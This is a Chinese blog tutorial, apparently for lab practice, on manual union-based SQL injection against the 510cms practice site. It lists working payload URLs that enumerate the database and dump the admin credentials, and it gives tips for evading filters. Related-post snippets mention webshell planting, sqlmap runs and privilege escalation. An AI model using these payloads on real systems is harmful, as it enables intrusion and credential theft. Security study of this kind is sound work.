SQL注入之get(510cms)

最新推荐文章于 2024-01-10 23:35:26 发布
最新推荐文章于 2024-01-10 23:35:26 发布
阅读量1.8k 收藏 5
点赞数 2
分类专栏: Security 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45775897/article/details/122332051
版权

一、查找是否存在SQL注入(注入点)

以510企业网站为例:
在这里插入图片描述

这里以漏洞参数id为例
?id=1id=1'进行测试,前提能够正常显示。
?id=1后面加上and 1=1两个结果都是真的,所以正常输出;
后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型
eg:

http://IP地址(域名)/news.php?cid=&listid=&newsid=24 and 1=1

二、查找有几列(字段)

后面加上order by数字即按第几列排序,从而得出有多少列
eg:

http://IP地址(域名)/news.php?cid=&listid=&newsid=24 order by 4

三、查看输出的是哪一列:

根据前面查出的字段数判断哪一列或哪几列输出显示

  • 注意前面的id=(数据库表中没有的值)
  • 若为数值型,后面加上一句and 1=2,保证union前面的句子值为false
    eg:
http://IP地址(域名)/news.php?cid=&listid=&newsid=1 union select 1,2,3,4

http://IP地址(域名)/news.php?cid=&listid=&newsid=24 and 1=2 union select 1,2,3,4

四、查询数据库的一些信息

参数功能
version()获取数据库版本
@@version获取数据库版本
@@datadir获取数据库数据路径
database()获取数据库名
user()获取用户名

eg:

http://IP地址(域名)/news.php?cid=&listid=&newsid=1 union select 1,2,database(),4

五、查询表名

通过select table_name from information_schema.tables where table_schema="数据库名"
eg:

http://IP地址(域名)/news.php?cid=&listid=&newsid=1 union select 1,2,table_name,4 from information_schema.tables where table_schema="510cms"

六、查询字段名(列名)

在注入的时候可能会出现数据库本身的编码问题
如执行UNION 查询时,报错:Illegal mix of collations for operation 'UNION’
可以用 convert() 进行编码转换如:
如:group_concat(TABLE_NAME)

  • group_concat(convert(TABLE_NAME using gbk))
  • group_concat(convert(TABLE_NAME using latin1))
  • group_concat(convert(TABLE_NAME using binary))
  • group_concat(convert(TABLE_NAME using utf-8))
  • group_concat(convert(TABLE_NAME using utf8))

其中, Latin1 是 ISO-8859-1 的别名,有些环境下写作 Latin-1。ISO-8859-1 编码是单字节编码, 向下兼容 ASCII。
eg:这里是一次性输出所有字段名,字段间以逗号隔开

http://IP地址(域名)/news.php?cid=&listid=&newsid=1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name="510_admin"

七、查询显示用户名和密码:

eg:

http://IP地址(域名)/news.php?cid=&listid=&newsid=1 union select 1,2,group_concat('name:',name,';passwd:',passwd),4 from 510_admin

有些情况from 数据库名.表名

总结

归根结底要具备数据库知识懂得数据库原理。
注意:
我们这里的例子是十分直接的,一般的题目是没这么直接的,
遇到--或者--+没有办法使用的时候,我们可以试试#
再比如有时候会有过滤。我们可以尝试双写或者大小写来绕过。

SQL注入GetShell:万众CMS的安全漏洞剖析与防范
失心少年
07-21 281
1 后台sql注入 逻辑绕过登录管理员账户。
510cms网站渗透测试
AmeV_ll的博客
01-23 2165
利用漏洞进行攻击分为漏洞挖掘、漏洞分析和漏洞利用三个步骤。漏洞挖掘是其他两个步骤的前提和基础,所以对于网络的攻防具有重要的意义。漏洞挖掘,顾名思义就是寻找漏洞,主要是通过综合应用各种技术和工具,尽可能地找出软件中的潜在漏洞,然而这并非一件很容易的事情,在很大程度上依赖于个人经验。根据分析对象的不同,漏洞挖掘技术可以分为基于源码的漏洞挖掘技术和基于目标代码的漏洞挖掘技术。
510cms渗透过程,挂马并提权
weixin_45911307的博客
04-03 2250
将网站放到AWVS里进行漏洞扫描,扫到以下漏洞,通过扫描的结果尝试攻击 1.存在SQL注入 使用sqlmap对url进行搜索,查看数据库 库名 表名 字段名 爆字段内容 成功拿到管理员账号和密码,进入后台 一开始找文件上传的点,没有找到可以上传木马文件的点 这里上传不了 因为这里有默认路径,所以尝试使用sqlmap的os-shell进行挂马 这里挂的是php的木马 之后os上传两个php文件,这两个一个是文件上传,一个是用来系统命令..
[代码审计]eml企业通讯录管理系统v5.0 存在sql注入
weixin_30588907的博客
11-28 282
0x00 前言 上周五的时候想练练手,随便找了个系统下载下来看看。 然后发现还有VIP版本,但是VIP要钱,看了一下演示站,貌似也没有什么改变,多了个导入功能?没细看。 搜了一下发现这个系统,压根就没有过滤。。注入点一堆 0x01 后台登录绕过 这个系统很简单,就一个后台,登录不进去都是废话 系统用了MVP模式,用的是smarty模板 没有安装页面,数据库自己创建好,...
510cms使用手工注入挂下一句话木马 中国菜刀 蚁剑 挂马连接510cms网站 分别使用navicat和sqlmap进行udf提权
记录笔记
04-12 636
我们知道此处有注入 使用order by 确定他的字段值 order by 得出 字段值是7 判断出来回显位数是4
SQL注入(一):数字型(手注)+利用+爆破
NSQ0207的博客
07-19 1496
查询语句:select id,email from member where username=$id
510cms进行渗透测试,找到其中的3个flag
Alashan12的博客
04-08 4773
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
云业CMS(yunyecms)的多处SQL注入审计分析.pdf
03-24
在该文件中,de*_add函数对GET和POST参数进行了判断,但是没有对参数进行安全过滤,导致用户输入的参数可以直接拼接到SQL语句中执行,造成SQL注入漏洞。该漏洞可以被利用来执行任意SQL语句,从而获取敏感数据或控制...
SQL注入攻击实例-CMS
weixin_62715196的博客
01-10 2094
记录一次对CMS靶场的注入过程,详细讲述如何注入的流程
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL 注入漏洞后台 本节将对 74CMS 3.0 SQL 注入漏洞后台进行详细分析,首先介绍了攻击环境的搭建,然后对代码进行了详细的审计,最后对漏洞进行了分析。 一、搭建攻击环境 为了进行攻击,我们需要搭建...
CmsEasy crossall_act.php SQL注入漏洞.md
04-08
SQL注入攻击者可以通过这个漏洞在数据库中执行恶意的SQL语句,从而对网站数据库进行非授权的操作。 ### SQL注入漏洞知识点 1. **SQL注入概念** SQL注入SQL Injection)是一种攻击技术,攻击者通过在Web表单输入...
510cms企业网站系统
04-30
510cms企业网站系统源码,以PHP+MYSQL+smarty开发的企业网站,可供大家学习交流。 mysql需自己导入没有写安装程序! 后台地址为admin/login.php 账号和密码都为admin
51套经典企业网站源码(五)
08-24
内容较大,权限不够,故将内容分为六个部分,需要的请自行下载。 教程版权归原作者所有,本人只是负责搜集整理,本人不承担任何技术及版权问题。教程仅提供学习参考,不得用于商业用途,请在下载后在24小时内删除。 目录: 0001-2科技发展有限公司升级版源码 0001科技发展有限公司修正版源码 0002机械配件制造销售公司修正版源码 0003家具地板公司修正版源码 0004-1机械有限公司修正版源码 0004机械有限公司修正版源码 0005机械产品公司修正版源码 0006绿色环保集团股份有限公司优化版 0007金属材料制品公司修正版源码 0008电气股份有限公司修正版源码 0009红色风格设备有限公司修正版源码 0010蓝色仪表配件有限公司优化版 0011装修公司网站系统修正版源码 0012环保工程企业网站修正版源码 0013国际集团股份有限公司修正版源码 0014蓝色汽车配件有限公司修正版源码 0015家俱集团有限公司源码 0016典雅地板家居网站源码 0017蓝色企业网站系统二 0018国际集团机械仪器公司修正版源码次优化版 0019红色风格企业网站系统优化版 0020机械设备公司修正版源码 0021蓝色环保工程企业网站系统修正版源码 0022国际集团电子科技公司修正版源码 0023国际集团机械电子公司修正版源码 0024美工超级漂亮的ASP卫生纸公司修正版源码 0025绿色环境保护工程公司修正版源码 0026绿色环保生态园林公司修正版源码 0028蓝色机械制造科技公司优化版 0029装修装饰公司企业网站修正版源码 0030绿色风格酒店网站修正版源码 0031机械制造网站修正版源码 0032蓝色机械制造公司修正版源码 0033机械设备制造公司修正版源码 0034ASP机械制造企业修正版源码 0035红色汽车配件公司网站修正版源码 0036机械制造企业修正版源码 0037机械设备公司修正版源码 0038浅蓝色电子科技公司修正版源码 0039机械制造公司企业网站修正版源码 0040国际集团机械有限公司修正版源码 0041机械设备公司优化版 0042机械企业修正版源码 0043机械设备有限公司修正版源码 0044红色机械设备有限公司修政版源码 0045汽车配件制造公司修正版源码 0046蓝色汽配公司修正版源码 0047绿色园林环保公司优化版 0048红色机械化工公司修正版源码 0049机械设备有限公司修正版源码 0051测试完整无错的经典万能企业站程序 0052某电气工程有限公司源码 0053优乐博特自动化工程有限公司网站源码
网站前端网页源码模板 (510).zip
09-24
网站前端网页源码模板 (510).zip
存在大量漏洞的实例网站
05-04
这是一个漏洞实例的应用程序,该应用程序存在大量的漏洞
SQL注入之Bool盲注(510cms
qq_45775897的博客
01-05 3094
SQL注入get可以参考: https://blog.youkuaiyun.com/qq_45775897/article/details/122332051 一、查找是否存在SQL注入注入点) 以510企业网站为例: 这里以漏洞参数id为例 用?id=1和id=1'进行测试,前提能够正常显示。 在?id=1后面加上and 1=1两个结果都是真的,所以正常输出; 后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型 eg: http://IP地址(域名)/news.php?cid=&
510cms,挂马连接,udf提权
m0_52341820的博客
04-14 1056
1、510cms(http://159.75.16.25:8887/)使用手工注入挂下一句话木马。操作步骤配截图。 ①对带具有测试功能的url进行sqlmap扫描 得到数据库版本信息 ②以此对所有数据库、当前所用数据库、表、字段进行扫描。 ③使用sqlmap对该url进行手工注入挂马 出现文件成功上传的链接,说明木马手工挂载成功 第一个链接是上传的连接(在这个页面可以上传木马了),第二个链接是挂的马 通过-ls命令可以查看挂入的木马 ④将上
510cms漏洞练习
weixin_56709770的博客
04-17 2415
510cms漏洞练习
存在sql注入cms
最新发布
01-23
### 如何防止CMS中的SQL注入漏洞 #### 使用预处理语句和参数化查询 为了有效预防SQL注入攻击,推荐使用预处理语句(Prepared Statements)和参数化查询。这种方式能够确保用户输入的内容不会被解释为SQL代码的一部分,从而避免恶意构造的SQL指令被执行。 ```php $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username'); $stmt->execute(['username' => $_GET['user']]); ``` 这种方法通过将SQL逻辑与数据分离来增强安全性[^1]。 #### 输入验证和清理 对于所有来自外部的数据源,应该实施严格的输入验证机制。这不仅限于表单提交的数据,还包括URL参数、HTTP头信息以及其他任何形式的用户交互产生的数据。具体措施包括但不限于: - 对字符串长度设定合理范围; - 过滤掉特殊字符如`'`, `"`等可能引起SQL解析错误的符号; - 验证数值型字段确实只包含数字; - 利用正则表达式匹配预期模式。 #### 减少不必要的数据库权限 应用程序连接到数据库使用的账户应当遵循最小特权原则,即仅授予完成特定任务所需的最低限度的操作权限。例如,在大多数情况下,Web应用只需要读写某些指定表格的权利,而不需要拥有创建新表或修改现有结构的能力。 #### 更新补丁并保持软件最新状态 定期检查所使用的CMS平台及其插件是否存在已知的安全问题,并及时安装官方发布的安全更新包。许多历史上的SQL注入案例都是因为未能修补旧版程序中存在的缺陷而导致的。 #### 启用防火墙和其他防护手段 部署Web应用防火墙(WAF),它可以识别常见的攻击模式并对可疑请求加以拦截;同时考虑启用其他形式的应用层保护措施,比如基于行为分析的风险控制系统。 #### 日志记录与监控 建立健全的日志体系有助于追踪潜在威胁活动轨迹,一旦发生异常事件便能迅速定位原因所在。此外,持续性的性能监测同样重要,任何偏离正常水平的表现都可能是遭受入侵前兆。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值